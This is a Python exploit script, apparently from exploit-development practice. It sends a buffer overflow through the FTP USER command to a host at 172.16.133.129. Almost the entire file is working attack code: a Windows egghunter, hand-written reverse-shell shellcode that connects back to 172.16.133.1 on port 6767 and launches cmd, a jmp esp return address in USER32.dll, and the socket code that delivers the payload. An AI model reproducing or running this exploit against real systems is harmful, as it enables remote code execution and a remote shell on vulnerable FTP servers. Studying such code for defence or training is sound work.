#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/07/05 13:53:58 dhn Exp $

import socket

# egg: GOOD
egghunter = (
    "\x66\x81\xca\xff\x0f"          # or	dx, 0xfff
    "\x42"                          # inc	edx
    "\x52"                          # push	edx
    "\x6a\x02"                      # push	2
    "\x58"                          # pop	eax
    "\xcd\x2e"                      # int	0x2e
    "\x3c\x05"                      # cmp	al, 5
    "\x5a"                          # pop	edx
    "\x74\xef"                      # je	0x1000
    "\xb8\x44\x4f\x4f\x47"          # mov	eax, 0x474f4f44
    "\x8b\xfa"                      # mov	edi, edx
    "\xaf"                          # scasd	eax, dword ptr es:[edi]
    "\x75\xea"                      # jne	0x1005
    "\xaf"                          # scasd	eax, dword ptr es:[edi]
    "\x75\xe7"                      # jne	0x1005
    "\xff\xe7"                      # jmp	edi
)

# [1] http://shell-storm.org/shellcode/files/shellcode-389.php
# [2] https://github.com/dhn/bin2op
# $ ml /c /coff /Cp /DTEST_CODE shell.asm
# $ link /subsystem:windows /section:.text,w shell.obj 
# $ bin2op.py -i -f shell.exe -l
shellcode = (
    "\xeb\x03"                      # jmp    0x401005
    "\x5f"                          # pop    edi
    "\xeb\x55"                      # jmp    0x40105a
    "\xe8\xf8\xff\xff\xff"          # call   0x401002
    "\x60"                          # pusha
    "\x85\xc0"                      # test   eax,eax
    "\x75\x0e"                      # jne    0x40101d
    "\x64\x8b\x40\x30"              # mov    eax,DWORD PTR fs:[eax+0x30]
    "\x8b\x40\x0c"                  # mov    eax,DWORD PTR [eax+0xc]
    "\x8b\x70\x1c"                  # mov    esi,DWORD PTR [eax+0x1c]
    "\xad"                          # lods   eax,DWORD PTR ds:[esi]
    "\x8b\x40\x08"                  # mov    eax,DWORD PTR [eax+0x8]
    "\x8b\xd0"                      # mov    edx,eax
    "\x03\x52\x3c"                  # add    edx,DWORD PTR [edx+0x3c]
    "\x8b\x52\x78"                  # mov    edx,DWORD PTR [edx+0x78]
    "\x03\xd0"                      # add    edx,eax
    "\x8b\x5a\x20"                  # mov    ebx,DWORD PTR [edx+0x20]
    "\x03\xd8"                      # add    ebx,eax
    "\x33\xc9"                      # xor    ecx,ecx
    "\x8b\xe8"                      # mov    ebp,eax
    "\x41"                          # inc    ecx
    "\x8b\x3c\x8b"                  # mov    edi,DWORD PTR [ebx+ecx*4]
    "\x03\xf8"                      # add    edi,eax
    "\x8b\x37"                      # mov    esi,DWORD PTR [edi]
    "\x03\x77\x04"                  # add    esi,DWORD PTR [edi+0x4]
    "\x3b\x74\x24\x24"              # cmp    esi,DWORD PTR [esp+0x24]
    "\x74\x02"                      # je     0x401043
    "\xeb\xed"                      # jmp    0x401030
    "\x8b\x5a\x24"                  # mov    ebx,DWORD PTR [edx+0x24]
    "\x03\xdd"                      # add    ebx,ebp
    "\x66\x8b\x0c\x4b"              # mov    cx,WORD PTR [ebx+ecx*2]
    "\x8b\x5a\x1c"                  # mov    ebx,DWORD PTR [edx+0x1c]
    "\x03\xdd"                      # add    ebx,ebp
    "\x03\x2c\x8b"                  # add    ebp,DWORD PTR [ebx+ecx*4]
    "\x89\x6c\x24\x1c"              # mov    DWORD PTR [esp+0x1c],ebp
    "\x61"                          # popa
    "\xc3"                          # ret
    "\x33\xc0"                      # xor    eax,eax
    "\x33\xc9"                      # xor    ecx,ecx
    "\x68\x98\xd8\xc3\xd6"          # push   0xd6c3d898
    "\xff\xd7"                      # call   edi
    "\x8b\xe8"                      # mov    ebp,eax
    "\x66\x51"                      # push   cx
    "\x66\x68\x33\x32"              # pushw  0x3233
    "\x68\x77\x73\x32\x5f"          # push   0x5f327377
    "\x54"                          # push   esp
    "\xff\xd0"                      # call   eax
    "\x8b\xd8"                      # mov    ebx,eax
    "\x68\xcb\xb4\xb3\xc7"          # push   0xc7b3b4cb
    "\xff\xd7"                      # call   edi
    "\x8b\xf4"                      # mov    esi,esp
    "\x66\x81\xc6\xff\xfc"          # add    si,0xfcff
    "\x56"                          # push   esi
    "\x6a\x02"                      # push   0x2
    "\xff\xd0"                      # call   eax
    "\x8b\xc3"                      # mov    eax,ebx
    "\x68\xc6\xb6\xac\xb8"          # push   0xb8acb6c6
    "\xff\xd7"                      # call   edi
    "\x33\xf6"                      # xor    esi,esi
    "\x56"                          # push   esi
    "\x56"                          # push   esi
    "\x56"                          # push   esi
    "\x56"                          # push   esi
    "\x46"                          # inc    esi
    "\x56"                          # push   esi
    "\x46"                          # inc    esi
    "\x56"                          # push   esi
    "\xff\xd0"                      # call   eax
    "\x93"                          # xchg   ebx,eax
    "\x68\xac\x10\x85\x01"          # push   0x18510ac => LHOST=172.16.133.1
    "\x66\x68\x1a\x6f"              # pushw  0x6f1a    => LPORT=6767
    "\x66\x56"                      # push   si
    "\x8b\xf4"                      # mov    esi,esp
    "\x68\xc8\xd2\xe2\x6e"          # push   0x6ee2d2c8
    "\xff\xd7"                      # call   edi
    "\x6a\x10"                      # push   0x10
    "\x56"                          # push   esi
    "\x53"                          # push   ebx
    "\xff\xd0"                      # call   eax
    "\x66\x50"                      # push   ax
    "\x66\x68\x72\x74"              # pushw  0x7472
    "\x68\x6d\x73\x76\x63"          # push   0x6376736d
    "\x54"                          # push   esp
    "\xff\xd5"                      # call   ebp
    "\x68\xd8\xe6\x73\xe8"          # push   0xe873e6d8
    "\xff\xd7"                      # call   edi
    "\x33\xc9"                      # xor    ecx,ecx
    "\x64\x8b\x49\x18"              # mov    ecx,DWORD PTR fs:[ecx+0x18]
    "\x8b\x49\x30"                  # mov    ecx,DWORD PTR [ecx+0x30]
    "\x8b\x49\x10"                  # mov    ecx,DWORD PTR [ecx+0x10]
    "\x89\x59\x18"                  # mov    DWORD PTR [ecx+0x18],ebx
    "\x89\x59\x1c"                  # mov    DWORD PTR [ecx+0x1c],ebx
    "\x89\x59\x20"                  # mov    DWORD PTR [ecx+0x20],ebx
    "\x68\x63\x6d\x64\xff"          # push   0xff646d63
    "\xfe\x44\x24\x03"              # inc    BYTE PTR [esp+0x3]
    "\x54"                          # push   esp
    "\xff\xd0"                      # call   eax
    "\x68\x95\xea\xd8\xd7"          # push   0xd7d8ea95
    "\xff\xd7"                      # call   edi
    "\xff\xd0"                      # call   eax
)

if __name__ == "__main__":
    padding = "A" * 16
    padding += "DOOGDOOG"
    padding += shellcode
    padding += "A" * (284 - 16 - 8 - len(shellcode))
    jmp_esp = "\x7E\x42\x93\x53"[::-1] # USER32.dll

    # stage 1
    payload = padding
    payload += jmp_esp
    payload += "\x90" * 8 + egghunter + "A" * (42 - len(egghunter) - 8)

    buf = "USER " + payload + "\r\n"

    print("[+] Sending the payload!")
    expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
    expl.connect(("172.16.133.129", 21))
    expl.send(buf)
    expl.recv(1024)
    expl.close()
